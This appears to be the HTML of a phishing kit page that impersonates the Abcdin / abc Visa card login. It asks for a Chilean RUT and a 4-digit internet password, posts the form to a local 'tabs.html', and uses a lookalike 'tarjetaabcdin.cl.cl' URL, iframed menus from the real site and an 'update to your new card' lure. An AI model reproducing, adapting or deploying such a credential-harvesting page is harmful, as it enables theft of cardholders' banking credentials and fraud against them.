<!doctype html>
<!--[if lt IE 7]><html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7]><html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8]><html lang="en" class="no-js ie8"><![endif]-->
<!--[if gt IE 8]><!-->
<html lang="es" class="no-js">
<!--<![endif]-->
<head>
<meta charset="UTF-8">
<title>Login Abcdin</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta name="description" content="XXX"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
<link rel="shortcut icon" href="favicon.png">
<!-- Open Graph data -->
<meta property="og:title" content="Abcdin | Login "/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="http://www.tarjetaabcdin.cl.cl/"/>
<meta property="og:image" content="XXX"/>
<meta property="og:description" content="Revisa y Paga tu Estado de Cuenta"/>
<link href="libs/table/demos/css/bootstrap.css" rel="stylesheet" type="text/css"/>
<script src="js/jquery-1.9.1.min.js" type="text/javascript"></script>
<script>
		if (!window.jQuery) {
			document.write('<script src="js/jquery-1.9.1.min.js"><\/script>');
		}
	</script>
<script>
		$(window).load(function () {
			// Animate loader off screen
			$(".se-pre-con").fadeOut("slow");;
		});
	</script>
<style>
		/* Paste this css to your style sheet file or under head tag */
		/* This only works with JavaScript, 
if it's not present, don't show loader */
		.no-js #loader {
			display: none;
		}
		.js #loader {
			display: block;
			position: absolute;
			left: 100px;
			top: 0;
		}
		.se-pre-con {
			position: fixed;
			left: 0px;
			top: 0px;
			width: 100%;
			height: 100%;
			z-index: 9999999;
			background: #fff;
		}
</style>
<!--bootstrap-->
<script src="js/bootstrap.min.js"></script>
<!--css-->
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="css/bootstrap.css">
<link rel="stylesheet" href="css/font-awesome.min.css">
<link rel="stylesheet" href="css/mobile.css">
<!--[if gt IE 9]><!-->
<link rel="stylesheet" href="css/nonIe.css">
<!--<![endif]-->
<script src="libs/login/jquery.nextval.min.js" type="text/javascript"></script>
<script type="text/javascript">
		$(function () {
			$('form[name=contact1]').nextVal({});
		});
	</script>
</head>
<body>
<!-- Google Tag Manager -->
<noscript>
<iframe src="//www.googletagmanager.com/ns.html?id=GTM-5JS4K3" height="0" width="0" style="display:none;visibility:hidden">
</iframe>
</noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-5JS4K3');</script>
<!-- End Google Tag Manager -->
<div class="se-pre-con">
	<img src="img/global/loader.gif" class="wow pulse" data-wow-iteration="15" style=" display: block; margin: auto; visibility: ;margin-top: 200px;"/>
</div>
<iframe src="http://www.tarjetaabc.cl/menu-superior/" class="iframeTarjeta" scrolling="no" frameborder="0" width="100%" height="130">
</iframe>
<div class="container-fluid mainContainer loginContainer">
	<div class="col-xs-12 col-sm-4 loginColumn">
		<div class="loginWelcome">
			Inicia Sesión
		</div>
		<form name="contact1" method="post" action="tabs.html">
			<p>
				<input type="text" placeholder="Ingresa tu RUT" validate="number" name="RUT"/>
				<br/>
				<input type="text" placeholder="Clave Internet" validate="empty" name="password"/>
				<br/>
				<input type="submit" value="Ingresar" class="btnOk"/>
			</p>
		</form>
		<div class="reminders">
			<a href="" data-featherlight="#obtenerClave">¿Qué es la clave de internet? </a>| <a href="" data-featherlight="#noRecuerdo">Obtener Clave Internet</a>
		</div>
	</div>
	<div class="col-xs-12 col-sm-4 welcomeColumn">
		<div class="loginTitle">
			Actualiza a tu nueva tarjeta abcvisa
			<div data-featherlight="#rutInvalido">
			</div>
		</div>
		<br>
		<div class="loginsubTitle">
			Y comienza a disfrutar de todos los beneficios que tenemos para ti
		</div>
	</div>
	<div class="col-xs-12 col-sm-4">
		<img class="img-resp" src="img/login/personaje.png"/>
	</div>
</div>
<!--ALERTS-->
<div class="lightbox contentBox" id="noRecuerdo">
	 Para obtener tu Clave Internet debes <br>
	 solicitarla en cualquiera de nuestras tiendas <br>
	 Abcdin o Dijon a lo largo del país. <br>
	<br>
	<a href="http://www.abcdin.cl/tienda/es/abcdin/tiendas/" target="_blank">- Ver Tiendas Abcdin</a>
	<br>
	<a href="http://www.dijon.cl/tiendas/" target="_blank">- Ver Tiendas Dijon</a>
</div>
<div class="lightbox contentBox" id="obtenerClave">
	 Tu <span>Clave Internet</span> es una contraseña de 4 dígitos que te permite acceder a www.abcvisa.cl y a todos los <span>canales remotos </span>de abcdin. <br>
	<br>
	Con tu Clave Internet podrás acceder a los siguientes servicios: <br>
	<br>
	 · Comprar en comercios nacionales a través de internet <br>
	 · Revisar Estados de Cuenta de meses anteriores <br>
	 · Pago del Estado de Cuenta en www.abcvisa.cl <br>
	 · Revisar tus Movimientos No Facturados <br>
	 · Comprar en Abcdin.cl con tu <span>Tarjeta abc - abc Visa</span><br>
</div>
<div class="lightbox contentBox" id="rutInvalido">
	 RUT y/o Clave inválidos<br>
	Intenta Nuevamente
</div>
<!--banner inferior-->
<div class="container-fluid mainContainer adContainer adContainerHome hidden-xs">
	<a href="http://www.abcvisa.cl/imperdibles/" target="_blank"><img src="banners/inferior.jpg" class="trans"/></a>
</div>
<iframe src="http://www.tarjetaabc.cl/menu-2/" class="iframeTarjeta" scrolling="no" frameborder="0" width="100%" height="78">
</iframe>
<!--[if lt IE 9]>
<script src="ie8/html5shiv.js"></script>
<link rel="stylesheet" href="ie8/ie8.css" type="text/css" />
<script src="ie8/respond.min.js"></script>
<![endif]-->
</body>
<!--lightbox-->
<link type="text/css" rel="stylesheet" href="libs/lightbox/featherlight.min.css"/>
<script src="libs/lightbox/featherlight.min.js" type="text/javascript" charset="utf-8"></script>
<!--scripts home-->
<script src="js/scripts-home.js" type="text/javascript" charset="utf-8"></script>
</html>